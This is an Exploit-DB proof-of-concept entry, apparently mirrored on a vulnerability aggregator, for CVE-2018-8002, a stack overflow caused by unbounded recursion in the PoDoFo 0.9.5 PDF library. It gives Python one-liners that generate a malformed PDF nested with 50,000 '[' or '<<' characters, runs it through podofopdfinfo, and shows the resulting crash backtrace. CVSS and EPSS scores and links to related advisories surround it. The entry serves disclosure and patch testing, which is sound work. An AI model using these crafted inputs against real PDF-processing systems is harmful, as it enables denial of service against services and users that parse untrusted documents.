Lucene search
R4xisEDB-ID:44946HistoryJun 26, 2018 - 12:00 a.m.
PoDoFo 0.9.5 - Buffer Overflow (PoC)
2018-06-2600:00:00
r4xis
www.exploit-db.com
45
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.04 Low
EPSS
Percentile
92.1%
# Exploit Title: PoDoFo 0.9.5 - Stack-Based Buffer Overflow (PoC)
# Date: 25.06.2018
# Software Link: https://sourceforge.net/projects/podofo/
# Vuln Version: 0.9.5
# CVE: cve-2018-8002
# Vulnerability Details: https://bugzilla.redhat.com/show_bug.cgi?id=1548930
# Exploit Author: r4xis
https://github.com/r4xis
exploit
-------------
podofo 0.9.3 (tested on ubuntu 16.04 32 bit)
$ python -c 'print "%PDF- 1 0 obj<<" + "["*50000' > poc.pdf;podofopdfinfo poc.pdf
podofo 0.9.4 (tested on debian 9.4 64 bit)
$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
podofo 0.9.5 (tested on ubuntu 18.04 64 bit)
$ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
Note: Also you can use "<<" characters;
$ python -c 'print "%PDF- 1 0 obj" + "<<"*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
reason
-----------
Recursive functions call to each others, until the stack overflow.
backtrace
-----------
for "[" chars;
...
#28 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#29 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#30 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#31 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#32 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#33 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#34 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#35 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#36 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#37 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#38 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#39 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#40 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#41 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#42 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#43 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#44 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#45 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#46 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#47 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
from /usr/lib/libpodofo.so.0.9.5
#48 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
#49 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
...Related
prion
prion
Stack overflow
2018-03-09 19:29:00
cvelist
cvelist
CVE-2018-8002
2018-03-09 19:00:00
zdt
zdt
PoDoFo 0.9.5 - Buffer Overflow Vulnerability
2018-06-26 00:00:00
osv
osv
CVE-2018-8002
2018-03-09 19:29:01
nvd
nvd
CVE-2018-8002
2018-03-09 19:29:01
debiancve
debiancve
CVE-2018-8002
2018-03-09 19:29:01
cve
cve
CVE-2018-8002
2018-03-09 19:29:01
exploitpack
exploitpack
PoDoFo 0.9.5 - Buffer Overflow (PoC)
2018-06-26 00:00:00
ubuntucve
ubuntucve
CVE-2018-8002
2018-03-09 00:00:00
packetstorm
packetstorm
PoDoFo 0.9.5 Buffer Overflow
2018-06-26 00:00:00
alpinelinux
alpinelinux
CVE-2018-8002
2018-03-09 19:29:01
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.04 Low
EPSS
Percentile
92.1%
Related for EDB-ID:44946